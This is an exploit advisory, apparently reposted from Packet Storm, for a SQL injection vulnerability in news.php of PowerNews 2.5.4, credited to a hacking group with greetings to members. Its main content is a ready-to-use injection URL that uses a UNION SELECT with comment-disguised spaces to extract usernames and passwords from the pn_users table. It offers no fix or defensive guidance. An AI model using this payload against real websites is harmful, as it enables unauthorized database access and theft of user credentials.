PowerNews version 2.5.4 suffers from a remote SQL injection vulnerability in news.php.
b197af705b1ad34e133d82b350325d8742f1ca0ca667060b0fc8423d212d1737 #######################################################################################
# #
# ...:::::powernews 2.5.4 SQL Injection Vulnerability::::.... #
#######################################################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
exploit:
https://site.com/news.php?newsid='/**/union/**/select/**/1,2,3,4,concat(nickname,0x3e,password),6,7,8,9/**/from/**/pn_users/*
----
young iranian h4ck3rz
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed